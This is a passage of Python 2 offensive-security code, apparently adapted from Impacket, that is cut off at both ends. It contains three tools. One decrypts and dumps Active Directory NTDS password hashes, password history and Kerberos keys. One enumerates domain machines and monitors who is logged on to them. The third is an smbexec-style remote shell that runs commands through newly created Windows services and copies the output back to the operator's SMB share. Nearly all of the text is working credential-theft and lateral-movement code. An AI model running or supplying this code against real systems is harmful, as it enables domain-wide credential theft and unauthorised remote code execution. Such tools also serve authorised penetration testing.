self.__cryptoCommon = CryptoCommon()
self.__hashesFound = {}
self.__kerberosKeys = collections.OrderedDict()
def __getPek(self):
logging.info('Searching for pekList, be patient')
pek = None
while True:
record = self.__ESEDB.getNextRow(self.__cursor)
if record is None:
break
elif record[self.NAME_TO_INTERNAL['pekList']] is not None:
pek = record[self.NAME_TO_INTERNAL['pekList']].decode('hex')
break
elif record[self.NAME_TO_INTERNAL['sAMAccountType']] in self.ACCOUNT_TYPES:
# Okey.. we found some users, but we're not yet ready to process them.
# Let's just store them in a temp list
self.__tmpUsers.append(record)
if pek is not None:
encryptedPek = self.PEK_KEY(pek)
md5 = hashlib.new('md5')
md5.update(self.__bootKey)
for i in range(1000):
md5.update(encryptedPek['KeyMaterial'])
tmpKey = md5.digest()
rc4 = ARC4.new(tmpKey)
plainText = rc4.encrypt(encryptedPek['EncryptedPek'])
self.__PEK = plainText[36:]
def __removeRC4Layer(self, cryptedHash):
md5 = hashlib.new('md5')
md5.update(self.__PEK)
md5.update(cryptedHash['KeyMaterial'])
tmpKey = md5.digest()
rc4 = ARC4.new(tmpKey)
plainText = rc4.encrypt(cryptedHash['EncryptedHash'])
return plainText
def __removeDESLayer(self, cryptedHash, rid):
Key1,Key2 = self.__cryptoCommon.deriveKey(int(rid))
Crypt1 = DES.new(Key1, DES.MODE_ECB)
Crypt2 = DES.new(Key2, DES.MODE_ECB)
decryptedHash = Crypt1.decrypt(cryptedHash[:8]) + Crypt2.decrypt(cryptedHash[8:])
return decryptedHash
def __decryptSupplementalInfo(self, record):
# This is based on [MS-SAMR] 2.2.10 Supplemental Credentials Structures
if record[self.NAME_TO_INTERNAL['supplementalCredentials']] is not None:
if len(record[self.NAME_TO_INTERNAL['supplementalCredentials']].decode('hex')) > 24:
if record[self.NAME_TO_INTERNAL['userPrincipalName']] is not None:
domain = record[self.NAME_TO_INTERNAL['userPrincipalName']].split('@')[-1]
userName = '%s\\%s' % (domain, record[self.NAME_TO_INTERNAL['sAMAccountName']])
else:
userName = '%s' % record[self.NAME_TO_INTERNAL['sAMAccountName']]
cipherText = self.CRYPTED_BLOB(record[self.NAME_TO_INTERNAL['supplementalCredentials']].decode('hex'))
plainText = self.__removeRC4Layer(cipherText)
try:
userProperties = samr.USER_PROPERTIES(plainText)
except:
# On some old w2k3 there might be user properties that don't
# match [MS-SAMR] structure, discarding them
return
propertiesData = userProperties['UserProperties']
for propertyCount in range(userProperties['PropertyCount']):
userProperty = samr.USER_PROPERTY(propertiesData)
propertiesData = propertiesData[len(userProperty):]
# For now, we will only process Newer Kerberos Keys.
if userProperty['PropertyName'].decode('utf-16le') == 'Primary:Kerberos-Newer-Keys':
propertyValueBuffer = userProperty['PropertyValue'].decode('hex')
kerbStoredCredentialNew = samr.KERB_STORED_CREDENTIAL_NEW(propertyValueBuffer)
data = kerbStoredCredentialNew['Buffer']
for credential in range(kerbStoredCredentialNew['CredentialCount']):
keyDataNew = samr.KERB_KEY_DATA_NEW(data)
data = data[len(keyDataNew):]
keyValue = propertyValueBuffer[keyDataNew['KeyOffset']:][:keyDataNew['KeyLength']]
if self.KERBEROS_TYPE.has_key(keyDataNew['KeyType']):
answer = "%s:%s:%s" % (userName, self.KERBEROS_TYPE[keyDataNew['KeyType']],keyValue.encode('hex'))
else:
answer = "%s:%s:%s" % (userName, hex(keyDataNew['KeyType']),keyValue.encode('hex'))
# We're just storing the keys, not printing them, to make the output more readable
# This is kind of ugly... but it's what I came up with tonight to get an ordered
# set :P. Better ideas welcomed ;)
self.__kerberosKeys[answer] = None
def __decryptHash(self, record):
logging.debug('Decrypting hash for user: %s' % record[self.NAME_TO_INTERNAL['name']])
sid = SAMR_RPC_SID(record[self.NAME_TO_INTERNAL['objectSid']].decode('hex'))
rid = sid.formatCanonical().split('-')[-1]
if record[self.NAME_TO_INTERNAL['dBCSPwd']] is not None:
encryptedLMHash = self.CRYPTED_HASH(record[self.NAME_TO_INTERNAL['dBCSPwd']].decode('hex'))
tmpLMHash = self.__removeRC4Layer(encryptedLMHash)
LMHash = self.__removeDESLayer(tmpLMHash, rid)
else:
LMHash = ntlm.LMOWFv1('','')
encryptedLMHash = None
if record[self.NAME_TO_INTERNAL['unicodePwd']] is not None:
encryptedNTHash = self.CRYPTED_HASH(record[self.NAME_TO_INTERNAL['unicodePwd']].decode('hex'))
tmpNTHash = self.__removeRC4Layer(encryptedNTHash)
NTHash = self.__removeDESLayer(tmpNTHash, rid)
else:
NTHash = ntlm.NTOWFv1('','')
encryptedNTHash = None
if record[self.NAME_TO_INTERNAL['userPrincipalName']] is not None:
domain = record[self.NAME_TO_INTERNAL['userPrincipalName']].split('@')[-1]
userName = '%s\\%s' % (domain, record[self.NAME_TO_INTERNAL['sAMAccountName']])
else:
userName = '%s' % record[self.NAME_TO_INTERNAL['sAMAccountName']]
answer = "%s:%s:%s:%s:::" % (userName, rid, LMHash.encode('hex'), NTHash.encode('hex'))
self.__hashesFound[record[self.NAME_TO_INTERNAL['objectSid']].decode('hex')] = answer
print answer
if self.__history:
LMHistory = []
NTHistory = []
if record[self.NAME_TO_INTERNAL['lmPwdHistory']] is not None:
lmPwdHistory = record[self.NAME_TO_INTERNAL['lmPwdHistory']]
encryptedLMHistory = self.CRYPTED_HISTORY(record[self.NAME_TO_INTERNAL['lmPwdHistory']].decode('hex'))
tmpLMHistory = self.__removeRC4Layer(encryptedLMHistory)
for i in range(0, len(tmpLMHistory)/16):
LMHash = self.__removeDESLayer(tmpLMHistory[i*16:(i+1)*16], rid)
LMHistory.append(LMHash)
if record[self.NAME_TO_INTERNAL['ntPwdHistory']] is not None:
ntPwdHistory = record[self.NAME_TO_INTERNAL['ntPwdHistory']]
encryptedNTHistory = self.CRYPTED_HISTORY(record[self.NAME_TO_INTERNAL['ntPwdHistory']].decode('hex'))
tmpNTHistory = self.__removeRC4Layer(encryptedNTHistory)
for i in range(0, len(tmpNTHistory)/16):
NTHash = self.__removeDESLayer(tmpNTHistory[i*16:(i+1)*16], rid)
NTHistory.append(NTHash)
for i, (LMHash, NTHash) in enumerate(map(lambda l,n: (l,n) if l else ('',n), LMHistory[1:], NTHistory[1:])):
if self.__noLMHash:
lmhash = ntlm.LMOWFv1('','').encode('hex')
else:
lmhash = LMHash.encode('hex')
answer = "%s_history%d:%s:%s:%s:::" % (userName, i, rid, lmhash, NTHash.encode('hex'))
self.__hashesFound[record[self.NAME_TO_INTERNAL['objectSid']].decode('hex')+str(i)] = answer
print answer
def dump(self):
if self.__NTDS is None:
# No NTDS.dit file provided
return
logging.info('Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)')
# We start getting rows from the table aiming at reaching
# the pekList. If we find users records we stored them
# in a temp list for later process.
self.__getPek()
if self.__PEK is not None:
logging.info('Pek found and decrypted: 0x%s' % self.__PEK.encode('hex'))
logging.info('Reading and decrypting hashes from %s ' % self.__NTDS)
# First of all, if we have users already cached, let's decrypt their hashes
for record in self.__tmpUsers:
try:
self.__decryptHash(record)
self.__decryptSupplementalInfo(record)
except Exception, e:
#import traceback
#print traceback.print_exc()
try:
logging.error("Error while processing row for user %s" % record[self.NAME_TO_INTERNAL['name']])
logging.error(str(e))
pass
except:
logging.error("Error while processing row!")
logging.error(str(e))
pass
# Now let's keep moving through the NTDS file and decrypting what we find
while True:
try:
record = self.__ESEDB.getNextRow(self.__cursor)
except:
logging.error('Error while calling getNextRow(), trying the next one')
continue
if record is None:
break
try:
if record[self.NAME_TO_INTERNAL['sAMAccountType']] in self.ACCOUNT_TYPES:
self.__decryptHash(record)
self.__decryptSupplementalInfo(record)
except Exception, e:
#import traceback
#print traceback.print_exc()
try:
logging.error("Error while processing row for user %s" % record[self.NAME_TO_INTERNAL['name']])
logging.error(str(e))
pass
except:
logging.error("Error while processing row!")
logging.error(str(e))
pass
# Now we'll print the Kerberos keys. So we don't mix things up in the output.
if len(self.__kerberosKeys) > 0:
logging.info('Kerberos keys from %s ' % self.__NTDS)
for itemKey in self.__kerberosKeys.keys():
print itemKey
def export(self, fileName):
if len(self.__hashesFound) > 0:
items = sorted(self.__hashesFound)
fd = open(fileName+'.ntds','w+')
for item in items:
try:
fd.write(self.__hashesFound[item]+'\n')
except Exception, e:
try:
logging.error("Error writing entry %d, skipping" % item)
except:
logging.error("Error writing entry, skipping")
pass
fd.close()
if len(self.__kerberosKeys) > 0:
fd = open(fileName+'.ntds.kerberos','w+')
for itemKey in self.__kerberosKeys.keys():
fd.write(itemKey+'\n')
fd.close()
def finish(self):
if self.__NTDS is not None:
self.__ESEDB.close()
class DumpSecrets:
def __init__(self, address, username = '', password = '', domain='', hashes = None, aesKey=None, doKerberos=False, system=False, security=False, sam=False, ntds=False, outputFileName = None, history=False):
self.__remoteAddr = address
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__smbConnection = None
self.__remoteOps = None
self.__SAMHashes = None
self.__NTDSHashes = None
self.__LSASecrets = None
self.__systemHive = system
self.__securityHive = security
self.__samHive = sam
self.__ntdsFile = ntds
self.__history = history
self.__noLMHash = True
self.__isRemote = True
self.__outputFileName = outputFileName
self.__doKerberos = doKerberos
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def connect(self):
self.__smbConnection = SMBConnection(self.__remoteAddr, self.__remoteAddr)
if self.__doKerberos:
self.__smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
else:
self.__smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
def getBootKey(self):
# Local Version whenever we are given the files directly
bootKey = ''
tmpKey = ''
winreg = winregistry.Registry(self.__systemHive, self.__isRemote)
# We gotta find out the Current Control Set
currentControlSet = winreg.getValue('\\Select\\Current')[1]
currentControlSet = "ControlSet%03d" % currentControlSet
for key in ['JD','Skew1','GBG','Data']:
logging.debug('Retrieving class info for %s'% key)
ans = winreg.getClass('\\%s\\Control\\Lsa\\%s' % (currentControlSet,key))
digit = ans[:16].decode('utf-16le')
tmpKey = tmpKey + digit
transforms = [ 8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7 ]
tmpKey = tmpKey.decode('hex')
for i in xrange(len(tmpKey)):
bootKey += tmpKey[transforms[i]]
logging.info('Target system bootKey: 0x%s' % bootKey.encode('hex'))
return bootKey
def checkNoLMHashPolicy(self):
logging.debug('Checking NoLMHash Policy')
winreg = winregistry.Registry(self.__systemHive, self.__isRemote)
# We gotta find out the Current Control Set
currentControlSet = winreg.getValue('\\Select\\Current')[1]
currentControlSet = "ControlSet%03d" % currentControlSet
#noLmHash = winreg.getValue('\\%s\\Control\\Lsa\\NoLmHash' % currentControlSet)[1]
noLmHash = winreg.getValue('\\%s\\Control\\Lsa\\NoLmHash' % currentControlSet)
if noLmHash is not None:
noLmHash = noLmHash[1]
else:
noLmHash = 0
if noLmHash != 1:
logging.debug('LMHashes are being stored')
return False
logging.debug('LMHashes are NOT being stored')
return True
def dump(self):
try:
if self.__remoteAddr.upper() == 'LOCAL' and self.__username == '':
self.__isRemote = False
bootKey = self.getBootKey()
if self.__ntdsFile is not None:
# Let's grab target's configuration about LM Hashes storage
self.__noLMHash = self.checkNoLMHashPolicy()
else:
self.__isRemote = True
self.connect()
self.__remoteOps = RemoteOperations(self.__smbConnection)
self.__remoteOps.enableRegistry()
bootKey = self.__remoteOps.getBootKey()
# Let's check whether target system stores LM Hashes
self.__noLMHash = self.__remoteOps.checkNoLMHashPolicy()
if self.__isRemote == True:
SAMFileName = self.__remoteOps.saveSAM()
else:
SAMFileName = self.__samHive
self.__SAMHashes = SAMHashes(SAMFileName, bootKey, isRemote = self.__isRemote)
self.__SAMHashes.dump()
if self.__outputFileName is not None:
self.__SAMHashes.export(self.__outputFileName)
if self.__isRemote == True:
SECURITYFileName = self.__remoteOps.saveSECURITY()
else:
SECURITYFileName = self.__securityHive
self.__LSASecrets= LSASecrets(SECURITYFileName, bootKey, self.__remoteOps, isRemote = self.__isRemote)
self.__LSASecrets.dumpCachedHashes()
if self.__outputFileName is not None:
self.__LSASecrets.exportCached(self.__outputFileName)
self.__LSASecrets.dumpSecrets()
if self.__outputFileName is not None:
self.__LSASecrets.exportSecrets(self.__outputFileName)
if self.__isRemote == True:
NTDSFileName = self.__remoteOps.saveNTDS()
else:
NTDSFileName = self.__ntdsFile
self.__NTDSHashes = NTDSHashes(NTDSFileName, bootKey, isRemote = self.__isRemote, history = self.__history, noLMHash = self.__noLMHash)
self.__NTDSHashes.dump()
if self.__outputFileName is not None:
self.__NTDSHashes.export(self.__outputFileName)
self.cleanup()
except (Exception, KeyboardInterrupt), e:
#import traceback
#print traceback.print_exc()
logging.error(e)
try:
self.cleanup()
except:
pass
def cleanup(self):
logging.info('Cleaning up... ')
if self.__remoteOps:
self.__remoteOps.finish()
if self.__SAMHashes:
self.__SAMHashes.finish()
if self.__LSASecrets:
self.__LSASecrets.finish()
if self.__NTDSHashes:
self.__NTDSHashes.finish()
if self.__isRemote == True:
self.__smbConnection.logoff()
'''
IMPACKET NETVIEW
'''
machinesAliveQueue = Queue()
machinesDownQueue = Queue()
myIP = None
def checkMachines(machines, stopEvent, singlePass=False):
origLen = len(machines)
deadMachines = machines
done = False
while not done:
if stopEvent.is_set():
done = True
break
for machine in deadMachines:
s = socket.socket()
try:
s = socket.create_connection((machine, 445), 2)
global myIP
myIP = s.getsockname()[0]
s.close()
machinesAliveQueue.put(machine)
except Exception, e:
logging.debug('%s: not alive (%s)' % (machine, e))
pass
else:
logging.debug('%s: alive!' % machine)
deadMachines.remove(machine)
if stopEvent.is_set():
done = True
break
logging.debug('up: %d, down: %d, total: %d' % (origLen-len(deadMachines), len(deadMachines), origLen))
if singlePass is True:
done = True
if not done:
time.sleep(10)
# Do we have some new deadMachines to add?
while machinesDownQueue.empty() is False:
deadMachines.append(machinesDownQueue.get())
class USERENUM:
def __init__(self, username = '', password = '', domain = '', hashes = None, aesKey = None, doKerberos=False, options=None):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__doKerberos = doKerberos
self.__options = options
self.__machinesList = list()
self.__targets = dict()
self.__filterUsers = None
self.__targetsThreadEvent = None
self.__maxConnections = int(options.max_connections)
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def getDomainMachines(self):
if self.__options.domainController is not None:
domainController = self.__options.domainController
elif self.__domain is not '':
domainController = self.__domain
else:
raise Exception('A domain is needed!')
logging.info('Getting machine\'s list from %s' % domainController)
rpctransport = transport.SMBTransport(domainController, 445, r'\samr', self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, doKerberos = self.__doKerberos)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
try:
resp = samr.hSamrConnect(dce)
serverHandle = resp['ServerHandle']
resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle)
domains = resp['Buffer']['Buffer']
logging.info("Looking up users in domain %s" % domains[0]['Name'])
resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle,domains[0]['Name'] )
resp = samr.hSamrOpenDomain(dce, serverHandle = serverHandle, domainId = resp['DomainId'])
domainHandle = resp['DomainHandle']
status = STATUS_MORE_ENTRIES
enumerationContext = 0
while status == STATUS_MORE_ENTRIES:
try:
resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, samr.USER_WORKSTATION_TRUST_ACCOUNT, enumerationContext = enumerationContext)
except Exception, e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
for user in resp['Buffer']['Buffer']:
self.__machinesList.append(user['Name'][:-1])
logging.debug('Machine name - rid: %s - %d'% (user['Name'], user['RelativeId']))
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
except Exception, e:
raise e
dce.disconnect()
def getTargets(self):
logging.info('Importing targets')
if self.__options.target is None and self.__options.targets is None:
# We need to download the list of machines from the domain
self.getDomainMachines()
elif self.__options.targets is not None:
for line in self.__options.targets.readlines():
self.__machinesList.append(line.strip(' \r\n'))
else:
# Just a single machine
self.__machinesList.append(self.__options.target)
logging.info("Got %d machines" % len(self.__machinesList))
def filterUsers(self):
if self.__options.user is not None:
self.__filterUsers = list()
self.__filterUsers.append(self.__options.user)
elif self.__options.users is not None:
# Grab users list from a file
self.__filterUsers = list()
for line in self.__options.users.readlines():
self.__filterUsers.append(line.strip(' \r\n'))
else:
self.__filterUsers = None
def run(self):
self.getTargets()
self.filterUsers()
#self.filterGroups()
# Up to here we should have figured out the scope of our work
self.__targetsThreadEvent = Event()
if self.__options.noloop is False:
# Start a separate thread checking the targets that are up
self.__targetsThread = Thread(target=checkMachines, args=(self.__machinesList,self.__targetsThreadEvent))
self.__targetsThread.start()
else:
# Since it's gonna be a one shoot test, we need to wait till it finishes
checkMachines(self.__machinesList,self.__targetsThreadEvent, singlePass=True)
while True:
# Do we have more machines to add?
while machinesAliveQueue.empty() is False:
machine = machinesAliveQueue.get()
logging.debug('Adding %s to the up list' % machine)
self.__targets[machine] = {}
self.__targets[machine]['SRVS'] = None
self.__targets[machine]['WKST'] = None
self.__targets[machine]['Admin'] = True
self.__targets[machine]['Sessions'] = list()
self.__targets[machine]['LoggedIn'] = set()
for target in self.__targets.keys():
try:
self.getSessions(target)
self.getLoggedIn(target)
except (SessionError, DCERPCException), e:
# We will silently pass these ones, might be issues with Kerberos, or DCE
if str(e).find('LOGON_FAILURE') >=0:
# For some reason our credentials don't work there,
# taking it out from the list.
logging.error('STATUS_LOGON_FAILURE for %s, discarding' % target)
del(self.__targets[target])
elif str(e).find('INVALID_PARAMETER') >=0:
del(self.__targets[target])
elif str(e).find('access_denied') >=0:
# Can't access the target RPC call, most probably a Unix host
# taking it out from the list
del(self.__targets[target])
else:
logging.info(str(e))
pass
except KeyboardInterrupt:
raise
except Exception, e:
#import traceback
#print traceback.print_exc()
if str(e).find('timed out') >=0:
# Most probably this site went down. taking it out
# ToDo: add it back to the list of machines to check in
# the separate thread - DONE
del(self.__targets[target])
machinesDownQueue.put(target)
else:
# These ones we will report
logging.error(e)
pass
if self.__options.noloop is True:
break
logging.debug('Sleeping for %s seconds' % self.__options.delay)
logging.debug('Currently monitoring %d active targets' % len(self.__targets))
time.sleep(int(self.__options.delay))
def getSessions(self, target):
if self.__targets[target]['SRVS'] is None:
stringSrvsBinding = r'ncacn_np:%s[\PIPE\srvsvc]' % target
rpctransportSrvs = transport.DCERPCTransportFactory(stringSrvsBinding)
if hasattr(rpctransportSrvs, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransportSrvs.set_credentials(self.__username,self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
rpctransportSrvs.set_kerberos(self.__doKerberos)
dce = rpctransportSrvs.get_dce_rpc()
dce.connect()
dce.bind(srvs.MSRPC_UUID_SRVS)
self.__maxConnections -= 1
else:
dce = self.__targets[target]['SRVS']
try:
resp = srvs.hNetrSessionEnum(dce, '\x00', NULL, 10)
except Exception, e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
self.__targets[target]['SRVS'] = None
self.__maxConnections += 1
return
else:
raise
if self.__maxConnections < 0:
# Can't keep this connection open. Closing it
dce.disconnect()
self.__maxConnections = 0
else:
self.__targets[target]['SRVS'] = dce
# Let's see who createad a connection since last check
tmpSession = list()
printCRLF = False
for session in resp['InfoStruct']['SessionInfo']['Level10']['Buffer']:
userName = session['sesi10_username'][:-1]
sourceIP = session['sesi10_cname'][:-1][2:]
key = '%s\x01%s' % (userName, sourceIP)
myEntry = '%s\x01%s' % (self.__username, myIP)
tmpSession.append(key)
if not(key in self.__targets[target]['Sessions']):
# Skipping myself
if key != myEntry:
self.__targets[target]['Sessions'].append(key)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print "%s: user %s logged from host %s - active: %d, idle: %d" % (target,userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time'])
printCRLF=True
else:
print "%s: user %s logged from host %s - active: %d, idle: %d" % (target,userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time'])
printCRLF=True
# Let's see who deleted a connection since last check
for nItem, session in enumerate(self.__targets[target]['Sessions']):
userName, sourceIP = session.split('\x01')
if session not in tmpSession:
del(self.__targets[target]['Sessions'][nItem])
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print "%s: user %s logged off from host %s" % (target, userName, sourceIP)
printCRLF=True
else:
print "%s: user %s logged off from host %s" % (target, userName, sourceIP)
printCRLF=True
if printCRLF is True:
print
def getLoggedIn(self, target):
if self.__targets[target]['Admin'] is False:
return
if self.__targets[target]['WKST'] is None:
stringWkstBinding = r'ncacn_np:%s[\PIPE\wkssvc]' % target
rpctransportWkst = transport.DCERPCTransportFactory(stringWkstBinding)
if hasattr(rpctransportWkst, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransportWkst.set_credentials(self.__username,self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
rpctransportWkst.set_kerberos(self.__doKerberos)
dce = rpctransportWkst.get_dce_rpc()
dce.connect()
dce.bind(wkst.MSRPC_UUID_WKST)
self.__maxConnections -= 1
else:
dce = self.__targets[target]['WKST']
try:
resp = wkst.hNetrWkstaUserEnum(dce,1)
except Exception, e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
self.__targets[target]['WKST'] = None
self.__maxConnections += 1
return
elif str(e).upper().find('ACCESS_DENIED'):
# We're not admin, bye
dce.disconnect()
self.__maxConnections += 1
self.__targets[target]['Admin'] = False
return
else:
raise
if self.__maxConnections < 0:
# Can't keep this connection open. Closing it
dce.disconnect()
self.__maxConnections = 0
else:
self.__targets[target]['WKST'] = dce
# Let's see who looged in locally since last check
tmpLoggedUsers = set()
printCRLF = False
for session in resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']:
userName = session['wkui1_username'][:-1]
logonDomain = session['wkui1_logon_domain'][:-1]
key = '%s\x01%s' % (userName, logonDomain)
tmpLoggedUsers.add(key)
if not(key in self.__targets[target]['LoggedIn']):
self.__targets[target]['LoggedIn'].add(key)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print "%s: user %s\\%s logged in LOCALLY" % (target,logonDomain,userName)
printCRLF=True
else:
print "%s: user %s\\%s logged in LOCALLY" % (target,logonDomain,userName)
printCRLF=True
# Let's see who logged out since last check
for session in self.__targets[target]['LoggedIn'].copy():
userName, logonDomain = session.split('\x01')
if session not in tmpLoggedUsers:
self.__targets[target]['LoggedIn'].remove(session)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print "%s: user %s\\%s logged off LOCALLY" % (target,logonDomain,userName)
printCRLF=True
else:
print "%s: user %s\\%s logged off LOCALLY" % (target,logonDomain,userName)
printCRLF=True
if printCRLF is True:
print
def stop(self):
if self.__targetsThreadEvent is not None:
self.__targetsThreadEvent.set()
'''
IMPACKET SMBEXEC
'''
SMBEXEC_OUTPUT_FILENAME = '__output'
SMBEXEC_BATCH_FILENAME = 'execute.bat'
SMBEXEC_SMBSERVER_DIR = '__tmp'
SMBEXEC_DUMMY_SHARE = 'TMP'
class SMBServer(Thread):
def __init__(self):
Thread.__init__(self)
def cleanup_server(self):
logging.info('Cleaning up..')
try:
os.unlink(SMBEXEC_SMBSERVER_DIR + '/smb.log')
except:
pass
os.rmdir(SMBEXEC_SMBSERVER_DIR)
def run(self):
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global','log_file',SMBEXEC_SMBSERVER_DIR + '/smb.log')
smbConfig.set('global','credentials_file','')
# Let's add a dummy share
smbConfig.add_section(SMBEXEC_DUMMY_SHARE)
smbConfig.set(SMBEXEC_DUMMY_SHARE,'comment','')
smbConfig.set(SMBEXEC_DUMMY_SHARE,'read only','no')
smbConfig.set(SMBEXEC_DUMMY_SHARE,'share type','0')
smbConfig.set(SMBEXEC_DUMMY_SHARE,'path',SMBEXEC_SMBSERVER_DIR)
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path')
self.smb = smbserver.SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
logging.info('Creating tmp directory')
try:
os.mkdir(SMBEXEC_SMBSERVER_DIR)
except Exception, e:
logging.critical(str(e))
pass
logging.info('Setting up SMB Server')
self.smb.processConfigFile()
logging.info('Ready to listen...')
try:
self.smb.serve_forever()
except:
pass
def stop(self):
self.cleanup_server()
self.smb.socket.close()
self.smb.server_close()
self._Thread__stop()
class CMDEXEC:
KNOWN_PROTOCOLS = {
'139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139),
'445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445),
}
def __init__(self, protocols = None,
username = '', password = '', domain = '', hashes = None, aesKey = None, doKerberos = None, mode = None, share = None):
if not protocols:
protocols = PSEXEC.KNOWN_PROTOCOLS.keys()
self.__username = username
self.__password = password
self.__protocols = [protocols]
self.__serviceName = 'BTOBTO'
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__doKerberos = doKerberos
self.__share = share
self.__mode = mode
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def run(self, addr):
for protocol in self.__protocols:
protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
logging.info("Trying protocol %s..." % protocol)
logging.info("Creating service %s..." % self.__serviceName)
stringbinding = protodef[0] % addr
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
if hasattr(rpctransport,'preferred_dialect'):
rpctransport.preferred_dialect(SMB_DIALECT)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)
rpctransport.set_kerberos(self.__doKerberos)
self.shell = None
try:
if self.__mode == 'SERVER':
serverThread = SMBServer()
serverThread.daemon = True
serverThread.start()
self.shell = SmbexecRemoteShell(self.__share, rpctransport, self.__mode, self.__serviceName)
self.shell.cmdloop()
if self.__mode == 'SERVER':
serverThread.stop()
except (Exception, KeyboardInterrupt), e:
#import traceback
#traceback.print_exc()
logging.critical(str(e))
if self.shell is not None:
self.shell.finish()
sys.stdout.flush()
sys.exit(1)
class SmbexecRemoteShell(cmd.Cmd):
def __init__(self, share, rpc, mode, serviceName):
cmd.Cmd.__init__(self)
self.__share = share
self.__mode = mode
self.__output = '\\Windows\\Temp\\' + SMBEXEC_OUTPUT_FILENAME
self.__batchFile = '%TEMP%\\' + SMBEXEC_BATCH_FILENAME
self.__outputBuffer = ''
self.__command = ''
self.__shell = '%COMSPEC% /Q /c '
self.__serviceName = serviceName
self.__rpc = rpc
self.intro = '[!] Launching semi-interactive shell - Careful what you execute'
self.__scmr = rpc.get_dce_rpc()
try:
self.__scmr.connect()
except Exception, e:
logging.critical(str(e))
sys.exit(1)
s = rpc.get_smb_connection()
# We don't wanna deal with timeouts from now on.
s.setTimeout(100000)
if mode == 'SERVER':
myIPaddr = s.getSMBServer().get_socket().getsockname()[0]
self.__copyBack = 'copy %s \\\\%s\\%s' % (self.__output, myIPaddr, SMBEXEC_DUMMY_SHARE)
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
resp = scmr.hROpenSCManagerW(self.__scmr)
self.__scHandle = resp['lpScHandle']
self.transferClient = rpc.get_smb_connection()
self.do_cd('')
def finish(self):
# Just in case the service is still created
try:
self.__scmr = self.__rpc.get_dce_rpc()
self.__scmr.connect()
self.__scmr.bind(svcctl.MSRPC_UUID_SVCCTL)
resp = scmr.hROpenSCManagerW(self.__scmr)
self.__scHandle = resp['lpScHandle']
resp = scmr.hROpenServiceW(self.__scmr, self.__scHandle, self.__serviceName)
service = resp['lpServiceHandle']
scmr.hRDeleteService(self.__scmr, service)
scmr.hRControlService(self.__scmr, service, scmr.SERVICE_CONTROL_STOP)
scmr.hRCloseServiceHandle(self.__scmr, service)
except Exception, e:
pass
def do_shell(self, s):
os.system(s)
def do_exit(self, s):
return True
def emptyline(self):
return False
def do_cd(self, s):
# We just can't CD or mantain track of the target dir.
if len(s) > 0:
logging.error("You can't CD under SMBEXEC. Use full paths.")
self.execute_remote('cd ' )
if len(self.__outputBuffer) > 0:
# Stripping CR/LF
self.prompt = string.replace(self.__outputBuffer,'\r\n','') + '>'
self.__outputBuffer = ''
def do_CD(self, s):
return self.do_cd(s)
def default(self, line):
if line != '':
self.send_data(line)
def get_output(self):
def output_callback(data):
self.__outputBuffer += data
if self.__mode == 'SHARE':
self.transferClient.getFile(self.__share, self.__output, output_callback)
self.transferClient.deleteFile(self.__share, self.__output)
else:
fd = open(SMBEXEC_SMBSERVER_DIR + '/' + SMBEXEC_OUTPUT_FILENAME,'r')
output_callback(fd.read())
fd.close()
os.unlink(SMBEXEC_SMBSERVER_DIR + '/' + SMBEXEC_OUTPUT_FILENAME)
def execute_remote(self, data):
command = self.__shell + 'echo ' + data + ' ^> ' + self.__output + ' 2^>^&1 > ' + self.__batchFile + ' & ' + self.__shell + self.__batchFile
if self.__mode == 'SERVER':
command += ' & ' + self.__copyBack
command += ' & ' + 'del ' + self.__batchFile
resp = scmr.hRCreateServiceW(self.__scmr, self.__scHandle, self.__serviceName, self.__serviceName, lpBinaryPathName=command)
service = resp['lpServiceHandle']
try:
